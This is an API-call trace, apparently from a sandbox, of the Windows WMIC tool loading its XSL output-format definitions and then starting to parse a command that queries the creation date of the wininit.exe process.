[0401.230] IUnknown:Release (This=0x21378d0) returned 0x0
[0401.230] IUnknown:Release (This=0x213a280) returned 0x0
[0401.230] IXMLDOMNodeList:get_item (in: This=0x2139cc0, index=7, listItem=0x16f590 | out: listItem=0x16f590*=0x213bd50) returned 0x0
[0401.230] IXMLDOMNode:get_text (in: This=0x213bd50, text=0x16f5a0 | out: text=0x16f5a0*="mof.xsl") returned 0x0
[0401.230] IXMLDOMNode:get_attributes (in: This=0x213bd50, attributeMap=0x16f598 | out: attributeMap=0x16f598*=0x21378d0) returned 0x0
[0401.230] malloc (_Size=0x18) returned 0x2091e0
[0401.230] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21378d0, name="KEYWORD", namedItem=0x16f5a8 | out: namedItem=0x16f5a8*=0x213a280) returned 0x0
[0401.231] free (_Block=0x2091e0)
[0401.231] IXMLDOMNode:get_nodeValue (in: This=0x213a280, value=0x16f5e0 | out: value=0x16f5e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="MOF", varVal2=0x80070001c)) returned 0x0
[0401.231] malloc (_Size=0x18) returned 0x2091e0
[0401.231] malloc (_Size=0x18) returned 0x209200
[0401.231] SysStringLen (param_1="MOF") returned 0x3
[0401.231] SysStringLen (param_1="TABLE") returned 0x5
[0401.231] SysStringLen (param_1="MOF") returned 0x3
[0401.231] SysStringLen (param_1="LIST") returned 0x4
[0401.231] SysStringLen (param_1="MOF") returned 0x3
[0401.231] SysStringLen (param_1="RAWXML") returned 0x6
[0401.231] SysStringLen (param_1="LIST") returned 0x4
[0401.231] SysStringLen (param_1="MOF") returned 0x3
[0401.231] malloc (_Size=0x30) returned 0x208280
[0401.232] IUnknown:Release (This=0x213bd50) returned 0x0
[0401.232] IUnknown:Release (This=0x21378d0) returned 0x0
[0401.232] IUnknown:Release (This=0x213a280) returned 0x0
[0401.232] IXMLDOMNodeList:get_item (in: This=0x2139cc0, index=8, listItem=0x16f590 | out: listItem=0x16f590*=0x213bd50) returned 0x0
[0401.232] IXMLDOMNode:get_text (in: This=0x213bd50, text=0x16f5a0 | out: text=0x16f5a0*="csv.xsl") returned 0x0
[0401.232] IXMLDOMNode:get_attributes (in: This=0x213bd50, attributeMap=0x16f598 | out: attributeMap=0x16f598*=0x21378d0) returned 0x0
[0401.232] malloc (_Size=0x18) returned 0x209220
[0401.232] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21378d0, name="KEYWORD", namedItem=0x16f5a8 | out: namedItem=0x16f5a8*=0x213a280) returned 0x0
[0401.233] free (_Block=0x209220)
[0401.233] IXMLDOMNode:get_nodeValue (in: This=0x213a280, value=0x16f5e0 | out: value=0x16f5e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CSV", varVal2=0x80070001c)) returned 0x0
[0401.233] malloc (_Size=0x18) returned 0x209220
[0401.233] malloc (_Size=0x18) returned 0x209240
[0401.233] SysStringLen (param_1="CSV") returned 0x3
[0401.233] SysStringLen (param_1="TABLE") returned 0x5
[0401.233] SysStringLen (param_1="CSV") returned 0x3
[0401.233] SysStringLen (param_1="LIST") returned 0x4
[0401.233] SysStringLen (param_1="CSV") returned 0x3
[0401.233] SysStringLen (param_1="HTABLE") returned 0x6
[0401.234] SysStringLen (param_1="CSV") returned 0x3
[0401.234] SysStringLen (param_1="HFORM") returned 0x5
[0401.234] malloc (_Size=0x30) returned 0x2082c0
[0401.234] IUnknown:Release (This=0x213bd50) returned 0x0
[0401.234] IUnknown:Release (This=0x21378d0) returned 0x0
[0401.234] IUnknown:Release (This=0x213a280) returned 0x0
[0401.234] IXMLDOMNodeList:get_item (in: This=0x2139cc0, index=9, listItem=0x16f590 | out: listItem=0x16f590*=0x213bd50) returned 0x0
[0401.234] IXMLDOMNode:get_text (in: This=0x213bd50, text=0x16f5a0 | out: text=0x16f5a0*="texttable.xsl") returned 0x0
[0401.234] IXMLDOMNode:get_attributes (in: This=0x213bd50, attributeMap=0x16f598 | out: attributeMap=0x16f598*=0x21378d0) returned 0x0
[0401.234] malloc (_Size=0x18) returned 0x209260
[0401.235] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21378d0, name="KEYWORD", namedItem=0x16f5a8 | out: namedItem=0x16f5a8*=0x213a280) returned 0x0
[0401.235] free (_Block=0x209260)
[0401.235] IXMLDOMNode:get_nodeValue (in: This=0x213a280, value=0x16f5e0 | out: value=0x16f5e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="texttablewsys.xsl", varVal2=0x80070001c)) returned 0x0
[0401.235] malloc (_Size=0x18) returned 0x209260
[0401.235] malloc (_Size=0x18) returned 0x209280
[0401.235] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
[0401.235] SysStringLen (param_1="TABLE") returned 0x5
[0401.235] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
[0401.236] SysStringLen (param_1="VALUE") returned 0x5
[0401.236] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
[0401.236] SysStringLen (param_1="XML") returned 0x3
[0401.236] SysStringLen (param_1="XML") returned 0x3
[0401.236] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
[0401.236] malloc (_Size=0x30) returned 0x208300
[0401.236] IUnknown:Release (This=0x213bd50) returned 0x0
[0401.236] IUnknown:Release (This=0x21378d0) returned 0x0
[0401.236] IUnknown:Release (This=0x213a280) returned 0x0
[0401.236] IXMLDOMNodeList:get_item (in: This=0x2139cc0, index=10, listItem=0x16f590 | out: listItem=0x16f590*=0x213bd50) returned 0x0
[0401.236] IXMLDOMNode:get_text (in: This=0x213bd50, text=0x16f5a0 | out: text=0x16f5a0*="texttable.xsl") returned 0x0
[0401.237] IXMLDOMNode:get_attributes (in: This=0x213bd50, attributeMap=0x16f598 | out: attributeMap=0x16f598*=0x21378d0) returned 0x0
[0401.237] malloc (_Size=0x18) returned 0x2092a0
[0401.237] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21378d0, name="KEYWORD", namedItem=0x16f5a8 | out: namedItem=0x16f5a8*=0x213a280) returned 0x0
[0401.237] free (_Block=0x2092a0)
[0401.237] IXMLDOMNode:get_nodeValue (in: This=0x213a280, value=0x16f5e0 | out: value=0x16f5e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="texttablewsys", varVal2=0x80070001c)) returned 0x0
[0401.237] malloc (_Size=0x18) returned 0x2092a0
[0401.237] malloc (_Size=0x18) returned 0x2092c0
[0401.238] SysStringLen (param_1="texttablewsys") returned 0xd
[0401.238] SysStringLen (param_1="TABLE") returned 0x5
[0401.238] SysStringLen (param_1="texttablewsys") returned 0xd
[0401.238] SysStringLen (param_1="XML") returned 0x3
[0401.238] SysStringLen (param_1="texttablewsys") returned 0xd
[0401.238] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
[0401.238] SysStringLen (param_1="XML") returned 0x3
[0401.238] SysStringLen (param_1="texttablewsys") returned 0xd
[0401.238] malloc (_Size=0x30) returned 0x208340
[0401.238] IUnknown:Release (This=0x213bd50) returned 0x0
[0401.238] IUnknown:Release (This=0x21378d0) returned 0x0
[0401.238] IUnknown:Release (This=0x213a280) returned 0x0
[0401.239] IXMLDOMNodeList:get_item (in: This=0x2139cc0, index=11, listItem=0x16f590 | out: listItem=0x16f590*=0x213bd50) returned 0x0
[0401.239] IXMLDOMNode:get_text (in: This=0x213bd50, text=0x16f5a0 | out: text=0x16f5a0*="texttable.xsl") returned 0x0
[0401.239] IXMLDOMNode:get_attributes (in: This=0x213bd50, attributeMap=0x16f598 | out: attributeMap=0x16f598*=0x21378d0) returned 0x0
[0401.239] malloc (_Size=0x18) returned 0x2092e0
[0401.239] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21378d0, name="KEYWORD", namedItem=0x16f5a8 | out: namedItem=0x16f5a8*=0x213a280) returned 0x0
[0401.239] free (_Block=0x2092e0)
[0401.239] IXMLDOMNode:get_nodeValue (in: This=0x213a280, value=0x16f5e0 | out: value=0x16f5e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformat.xsl", varVal2=0x80070001c)) returned 0x0
[0401.239] malloc (_Size=0x18) returned 0x2092e0
[0401.240] malloc (_Size=0x18) returned 0x209300
[0401.240] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15
[0401.240] SysStringLen (param_1="TABLE") returned 0x5
[0401.240] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15
[0401.240] SysStringLen (param_1="XML") returned 0x3
[0401.240] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15
[0401.240] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
[0401.240] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
[0401.240] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15
[0401.240] malloc (_Size=0x30) returned 0x208380
[0401.240] IUnknown:Release (This=0x213bd50) returned 0x0
[0401.240] IUnknown:Release (This=0x21378d0) returned 0x0
[0401.240] IUnknown:Release (This=0x213a280) returned 0x0
[0401.241] IXMLDOMNodeList:get_item (in: This=0x2139cc0, index=12, listItem=0x16f590 | out: listItem=0x16f590*=0x213bd50) returned 0x0
[0401.241] IXMLDOMNode:get_text (in: This=0x213bd50, text=0x16f5a0 | out: text=0x16f5a0*="texttable.xsl") returned 0x0
[0401.241] IXMLDOMNode:get_attributes (in: This=0x213bd50, attributeMap=0x16f598 | out: attributeMap=0x16f598*=0x21378d0) returned 0x0
[0401.241] malloc (_Size=0x18) returned 0x209320
[0401.241] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21378d0, name="KEYWORD", namedItem=0x16f5a8 | out: namedItem=0x16f5a8*=0x213a280) returned 0x0
[0401.241] free (_Block=0x209320)
[0401.241] IXMLDOMNode:get_nodeValue (in: This=0x213a280, value=0x16f5e0 | out: value=0x16f5e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformat", varVal2=0x80070001c)) returned 0x0
[0401.241] malloc (_Size=0x18) returned 0x209320
[0401.242] malloc (_Size=0x18) returned 0x209340
[0401.242] SysStringLen (param_1="wmiclitableformat") returned 0x11
[0401.242] SysStringLen (param_1="TABLE") returned 0x5
[0401.242] SysStringLen (param_1="wmiclitableformat") returned 0x11
[0401.242] SysStringLen (param_1="XML") returned 0x3
[0401.242] SysStringLen (param_1="wmiclitableformat") returned 0x11
[0401.242] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
[0401.242] SysStringLen (param_1="wmiclitableformat") returned 0x11
[0401.242] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15
[0401.242] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
[0401.242] SysStringLen (param_1="wmiclitableformat") returned 0x11
[0401.242] malloc (_Size=0x30) returned 0x2083c0
[0401.242] IUnknown:Release (This=0x213bd50) returned 0x0
[0401.243] IUnknown:Release (This=0x21378d0) returned 0x0
[0401.243] IUnknown:Release (This=0x213a280) returned 0x0
[0401.243] IXMLDOMNodeList:get_item (in: This=0x2139cc0, index=13, listItem=0x16f590 | out: listItem=0x16f590*=0x213bd50) returned 0x0
[0401.243] IXMLDOMNode:get_text (in: This=0x213bd50, text=0x16f5a0 | out: text=0x16f5a0*="texttable.xsl") returned 0x0
[0401.243] IXMLDOMNode:get_attributes (in: This=0x213bd50, attributeMap=0x16f598 | out: attributeMap=0x16f598*=0x21378d0) returned 0x0
[0401.243] malloc (_Size=0x18) returned 0x209360
[0401.243] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21378d0, name="KEYWORD", namedItem=0x16f5a8 | out: namedItem=0x16f5a8*=0x213a280) returned 0x0
[0401.243] free (_Block=0x209360)
[0401.243] IXMLDOMNode:get_nodeValue (in: This=0x213a280, value=0x16f5e0 | out: value=0x16f5e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformatnosys.xsl", varVal2=0x80070001c)) returned 0x0
[0401.243] malloc (_Size=0x18) returned 0x209360
[0401.244] malloc (_Size=0x18) returned 0x209380
[0401.244] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a
[0401.244] SysStringLen (param_1="TABLE") returned 0x5
[0401.244] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a
[0401.244] SysStringLen (param_1="XML") returned 0x3
[0401.245] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a
[0401.245] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
[0401.245] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a
[0401.245] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15
[0401.245] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15
[0401.245] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a
[0401.245] malloc (_Size=0x30) returned 0x208400
[0401.245] IUnknown:Release (This=0x213bd50) returned 0x0
[0401.245] IUnknown:Release (This=0x21378d0) returned 0x0
[0401.245] IUnknown:Release (This=0x213a280) returned 0x0
[0401.245] IXMLDOMNodeList:get_item (in: This=0x2139cc0, index=14, listItem=0x16f590 | out: listItem=0x16f590*=0x213bd50) returned 0x0
[0401.246] IXMLDOMNode:get_text (in: This=0x213bd50, text=0x16f5a0 | out: text=0x16f5a0*="texttable.xsl") returned 0x0
[0401.246] IXMLDOMNode:get_attributes (in: This=0x213bd50, attributeMap=0x16f598 | out: attributeMap=0x16f598*=0x21378d0) returned 0x0
[0401.246] malloc (_Size=0x18) returned 0x2093a0
[0401.246] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21378d0, name="KEYWORD", namedItem=0x16f5a8 | out: namedItem=0x16f5a8*=0x213a280) returned 0x0
[0401.246] free (_Block=0x2093a0)
[0401.246] IXMLDOMNode:get_nodeValue (in: This=0x213a280, value=0x16f5e0 | out: value=0x16f5e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformatnosys", varVal2=0x80070001c)) returned 0x0
[0401.246] malloc (_Size=0x18) returned 0x2093a0
[0401.246] malloc (_Size=0x18) returned 0x2093c0
[0401.246] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16
[0401.247] SysStringLen (param_1="TABLE") returned 0x5
[0401.247] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16
[0401.247] SysStringLen (param_1="XML") returned 0x3
[0401.247] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16
[0401.247] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
[0401.247] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16
[0401.247] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15
[0401.247] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16
[0401.247] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a
[0401.247] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15
[0401.247] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16
[0401.247] malloc (_Size=0x30) returned 0x208440
[0401.247] IUnknown:Release (This=0x213bd50) returned 0x0
[0401.247] IUnknown:Release (This=0x21378d0) returned 0x0
[0401.247] IUnknown:Release (This=0x213a280) returned 0x0
[0401.248] IXMLDOMNodeList:get_item (in: This=0x2139cc0, index=15, listItem=0x16f590 | out: listItem=0x16f590*=0x213bd50) returned 0x0
[0401.248] IXMLDOMNode:get_text (in: This=0x213bd50, text=0x16f5a0 | out: text=0x16f5a0*="htable.xsl") returned 0x0
[0401.248] IXMLDOMNode:get_attributes (in: This=0x213bd50, attributeMap=0x16f598 | out: attributeMap=0x16f598*=0x21378d0) returned 0x0
[0401.248] malloc (_Size=0x18) returned 0x2093e0
[0401.248] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21378d0, name="KEYWORD", namedItem=0x16f5a8 | out: namedItem=0x16f5a8*=0x213a280) returned 0x0
[0401.248] free (_Block=0x2093e0)
[0401.248] IXMLDOMNode:get_nodeValue (in: This=0x213a280, value=0x16f5e0 | out: value=0x16f5e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="htable-sortby.xsl", varVal2=0x80070001c)) returned 0x0
[0401.248] malloc (_Size=0x18) returned 0x2093e0
[0401.248] malloc (_Size=0x18) returned 0x209400
[0401.249] SysStringLen (param_1="htable-sortby.xsl") returned 0x11
[0401.249] SysStringLen (param_1="TABLE") returned 0x5
[0401.249] SysStringLen (param_1="htable-sortby.xsl") returned 0x11
[0401.249] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
[0401.249] SysStringLen (param_1="htable-sortby.xsl") returned 0x11
[0401.249] SysStringLen (param_1="XML") returned 0x3
[0401.249] SysStringLen (param_1="htable-sortby.xsl") returned 0x11
[0401.249] SysStringLen (param_1="texttablewsys") returned 0xd
[0401.249] SysStringLen (param_1="XML") returned 0x3
[0401.249] SysStringLen (param_1="htable-sortby.xsl") returned 0x11
[0401.249] malloc (_Size=0x30) returned 0x208480
[0401.249] IUnknown:Release (This=0x213bd50) returned 0x0
[0401.249] IUnknown:Release (This=0x21378d0) returned 0x0
[0401.250] IUnknown:Release (This=0x213a280) returned 0x0
[0401.250] IXMLDOMNodeList:get_item (in: This=0x2139cc0, index=16, listItem=0x16f590 | out: listItem=0x16f590*=0x213bd50) returned 0x0
[0401.250] IXMLDOMNode:get_text (in: This=0x213bd50, text=0x16f5a0 | out: text=0x16f5a0*="htable.xsl") returned 0x0
[0401.250] IXMLDOMNode:get_attributes (in: This=0x213bd50, attributeMap=0x16f598 | out: attributeMap=0x16f598*=0x21378d0) returned 0x0
[0401.250] malloc (_Size=0x18) returned 0x209420
[0401.250] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21378d0, name="KEYWORD", namedItem=0x16f5a8 | out: namedItem=0x16f5a8*=0x213a280) returned 0x0
[0401.250] free (_Block=0x209420)
[0401.250] IXMLDOMNode:get_nodeValue (in: This=0x213a280, value=0x16f5e0 | out: value=0x16f5e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="htable-sortby", varVal2=0x80070001c)) returned 0x0
[0401.250] malloc (_Size=0x18) returned 0x209420
[0401.250] malloc (_Size=0x18) returned 0x209440
[0401.251] SysStringLen (param_1="htable-sortby") returned 0xd
[0401.251] SysStringLen (param_1="TABLE") returned 0x5
[0401.251] SysStringLen (param_1="htable-sortby") returned 0xd
[0401.251] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
[0401.251] SysStringLen (param_1="htable-sortby") returned 0xd
[0401.251] SysStringLen (param_1="XML") returned 0x3
[0401.251] SysStringLen (param_1="htable-sortby") returned 0xd
[0401.251] SysStringLen (param_1="texttablewsys") returned 0xd
[0401.251] SysStringLen (param_1="htable-sortby") returned 0xd
[0401.251] SysStringLen (param_1="htable-sortby.xsl") returned 0x11
[0401.251] SysStringLen (param_1="XML") returned 0x3
[0401.251] SysStringLen (param_1="htable-sortby") returned 0xd
[0401.251] malloc (_Size=0x30) returned 0x2084c0
[0401.251] IUnknown:Release (This=0x213bd50) returned 0x0
[0401.252] IUnknown:Release (This=0x21378d0) returned 0x0
[0401.252] IUnknown:Release (This=0x213a280) returned 0x0
[0401.252] IXMLDOMNodeList:get_item (in: This=0x2139cc0, index=17, listItem=0x16f590 | out: listItem=0x16f590*=0x213bd50) returned 0x0
[0401.252] IXMLDOMNode:get_text (in: This=0x213bd50, text=0x16f5a0 | out: text=0x16f5a0*="mof.xsl") returned 0x0
[0401.252] IXMLDOMNode:get_attributes (in: This=0x213bd50, attributeMap=0x16f598 | out: attributeMap=0x16f598*=0x21378d0) returned 0x0
[0401.252] malloc (_Size=0x18) returned 0x209460
[0401.252] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21378d0, name="KEYWORD", namedItem=0x16f5a8 | out: namedItem=0x16f5a8*=0x213a280) returned 0x0
[0401.252] free (_Block=0x209460)
[0401.252] IXMLDOMNode:get_nodeValue (in: This=0x213a280, value=0x16f5e0 | out: value=0x16f5e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclimofformat.xsl", varVal2=0x80070001c)) returned 0x0
[0401.252] malloc (_Size=0x18) returned 0x209460
[0401.252] malloc (_Size=0x18) returned 0x209480
[0401.253] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13
[0401.253] SysStringLen (param_1="TABLE") returned 0x5
[0401.253] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13
[0401.253] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
[0401.253] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13
[0401.253] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15
[0401.253] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13
[0401.253] SysStringLen (param_1="wmiclitableformat") returned 0x11
[0401.253] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
[0401.253] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13
[0401.253] malloc (_Size=0x30) returned 0x208500
[0401.253] IUnknown:Release (This=0x213bd50) returned 0x0
[0401.253] IUnknown:Release (This=0x21378d0) returned 0x0
[0401.254] IUnknown:Release (This=0x213a280) returned 0x0
[0401.254] IXMLDOMNodeList:get_item (in: This=0x2139cc0, index=18, listItem=0x16f590 | out: listItem=0x16f590*=0x213bd50) returned 0x0
[0401.254] IXMLDOMNode:get_text (in: This=0x213bd50, text=0x16f5a0 | out: text=0x16f5a0*="mof.xsl") returned 0x0
[0401.254] IXMLDOMNode:get_attributes (in: This=0x213bd50, attributeMap=0x16f598 | out: attributeMap=0x16f598*=0x21378d0) returned 0x0
[0401.254] malloc (_Size=0x18) returned 0x2094a0
[0401.254] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21378d0, name="KEYWORD", namedItem=0x16f5a8 | out: namedItem=0x16f5a8*=0x213a280) returned 0x0
[0401.254] free (_Block=0x2094a0)
[0401.254] IXMLDOMNode:get_nodeValue (in: This=0x213a280, value=0x16f5e0 | out: value=0x16f5e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclimofformat", varVal2=0x80070001c)) returned 0x0
[0401.254] malloc (_Size=0x18) returned 0x2094a0
[0401.254] malloc (_Size=0x18) returned 0x2094c0
[0401.255] SysStringLen (param_1="wmiclimofformat") returned 0xf
[0401.255] SysStringLen (param_1="TABLE") returned 0x5
[0401.255] SysStringLen (param_1="wmiclimofformat") returned 0xf
[0401.255] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
[0401.255] SysStringLen (param_1="wmiclimofformat") returned 0xf
[0401.255] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15
[0401.255] SysStringLen (param_1="wmiclimofformat") returned 0xf
[0401.255] SysStringLen (param_1="wmiclitableformat") returned 0x11
[0401.255] SysStringLen (param_1="wmiclimofformat") returned 0xf
[0401.255] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13
[0401.255] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
[0401.255] SysStringLen (param_1="wmiclimofformat") returned 0xf
[0401.255] malloc (_Size=0x30) returned 0x208540
[0401.255] IUnknown:Release (This=0x213bd50) returned 0x0
[0401.256] IUnknown:Release (This=0x21378d0) returned 0x0
[0401.256] IUnknown:Release (This=0x213a280) returned 0x0
[0401.256] IXMLDOMNodeList:get_item (in: This=0x2139cc0, index=19, listItem=0x16f590 | out: listItem=0x16f590*=0x213bd50) returned 0x0
[0401.256] IXMLDOMNode:get_text (in: This=0x213bd50, text=0x16f5a0 | out: text=0x16f5a0*="textvaluelist.xsl") returned 0x0
[0401.256] IXMLDOMNode:get_attributes (in: This=0x213bd50, attributeMap=0x16f598 | out: attributeMap=0x16f598*=0x21378d0) returned 0x0
[0401.256] malloc (_Size=0x18) returned 0x2094e0
[0401.256] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21378d0, name="KEYWORD", namedItem=0x16f5a8 | out: namedItem=0x16f5a8*=0x213a280) returned 0x0
[0401.256] free (_Block=0x2094e0)
[0401.256] IXMLDOMNode:get_nodeValue (in: This=0x213a280, value=0x16f5e0 | out: value=0x16f5e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclivalueformat.xsl", varVal2=0x80070001c)) returned 0x0
[0401.257] malloc (_Size=0x18) returned 0x2094e0
[0401.257] malloc (_Size=0x18) returned 0x209500
[0401.257] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15
[0401.257] SysStringLen (param_1="TABLE") returned 0x5
[0401.257] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15
[0401.257] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
[0401.257] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15
[0401.257] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15
[0401.257] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15
[0401.257] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a
[0401.257] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a
[0401.257] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15
[0401.257] malloc (_Size=0x30) returned 0x208580
[0401.258] IUnknown:Release (This=0x213bd50) returned 0x0
[0401.258] IUnknown:Release (This=0x21378d0) returned 0x0
[0401.258] IUnknown:Release (This=0x213a280) returned 0x0
[0401.258] IXMLDOMNodeList:get_item (in: This=0x2139cc0, index=20, listItem=0x16f590 | out: listItem=0x16f590*=0x213bd50) returned 0x0
[0401.258] IXMLDOMNode:get_text (in: This=0x213bd50, text=0x16f5a0 | out: text=0x16f5a0*="textvaluelist.xsl") returned 0x0
[0401.258] IXMLDOMNode:get_attributes (in: This=0x213bd50, attributeMap=0x16f598 | out: attributeMap=0x16f598*=0x21378d0) returned 0x0
[0401.258] malloc (_Size=0x18) returned 0x209520
[0401.258] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21378d0, name="KEYWORD", namedItem=0x16f5a8 | out: namedItem=0x16f5a8*=0x213a280) returned 0x0
[0401.258] free (_Block=0x209520)
[0401.258] IXMLDOMNode:get_nodeValue (in: This=0x213a280, value=0x16f5e0 | out: value=0x16f5e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclivalueformat", varVal2=0x80070001c)) returned 0x0
[0401.259] malloc (_Size=0x18) returned 0x209520
[0401.259] malloc (_Size=0x18) returned 0x209540
[0401.259] SysStringLen (param_1="wmiclivalueformat") returned 0x11
[0401.259] SysStringLen (param_1="TABLE") returned 0x5
[0401.259] SysStringLen (param_1="wmiclivalueformat") returned 0x11
[0401.259] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
[0401.259] SysStringLen (param_1="wmiclivalueformat") returned 0x11
[0401.259] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15
[0401.259] SysStringLen (param_1="wmiclivalueformat") returned 0x11
[0401.259] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a
[0401.259] SysStringLen (param_1="wmiclivalueformat") returned 0x11
[0401.259] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15
[0401.260] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a
[0401.260] SysStringLen (param_1="wmiclivalueformat") returned 0x11
[0401.260] malloc (_Size=0x30) returned 0x2085c0
[0401.260] IUnknown:Release (This=0x213bd50) returned 0x0
[0401.260] IUnknown:Release (This=0x21378d0) returned 0x0
[0401.260] IUnknown:Release (This=0x213a280) returned 0x0
[0401.260] IUnknown:Release (This=0x2139cc0) returned 0x0
[0401.260] FreeThreadedDOMDocument:IUnknown:Release (This=0x213bc50) returned 0x1
[0401.260] FreeThreadedDOMDocument:IUnknown:Release (This=0x21371d0) returned 0x0
[0401.260] free (_Block=0x209040)
[0401.261] GetCommandLineW () returned="WMIC PROCESS where name=\"wininit.exe\" get creationdate "
[0401.261] malloc (_Size=0x80) returned 0x206e60
[0401.261] memcpy_s (in: _Destination=0x206e60, _DestinationSize=0x7e, _Source=0x242718, _SourceSize=0x70 | out: _Destination=0x206e60) returned 0x0
[0401.261] malloc (_Size=0x18) returned 0x209040
[0401.262] malloc (_Size=0x18) returned 0x209560
[0401.262] malloc (_Size=0x18) returned 0x209580
[0401.262] malloc (_Size=0x18) returned 0x2095a0
[0401.262] malloc (_Size=0x80) returned 0x20cb50
[0401.262] GetLocalTime (in: lpSystemTime=0x16f750 | out: lpSystemTime=0x16f750*(wYear=0x7e8, wMonth=0x6, wDayOfWeek=0x1, wDay=0x3, wHour=0xb, wMinute=0x21, wSecond=0x1, wMilliseconds=0x44))
[0401.262] _vsnwprintf (in: _Buffer=0x20cb50, _BufferCount=0x3f, _Format="%.2d-%.2d-%.4dT%.2d:%.2d:%.2d", _ArgList=0x16f6a8 | out: _Buffer="06-03-2024T11:33:01") returned 19
[0401.262] lstrlenW (lpString=" PROCESS where name=\"wininit.exe\" get creationdate ") returned 52
[0401.262] malloc (_Size=0x6a) returned 0x20cbe0
[0401.262] lstrlenW (lpString=" PROCESS where name=\"wininit.exe\" get creationdate ") returned 52
[0401.262] lstrlenW (lpString=" PROCESS where name=\"wininit.exe\" get creationdate ") returned 52
[0401.262] malloc (_Size=0x6a) returned 0x20cc60
[0401.263] lstrlenW (lpString=" PROCESS where name=\"wininit.exe\" get creationdate ") returned 52
[0401.263] lstrlenW (lpString=" PROCESS where name=\"wininit.exe\" get creationdate ") returned 52
[0401.263] lstrlenW (lpString=" PROCESS where name=\"wininit.exe\" get creationdate ") returned 52
[0401.263] malloc (_Size=0x10) returned 0x2095c0
[0401.263] lstrlenW (lpString="PROCESS") returned 7
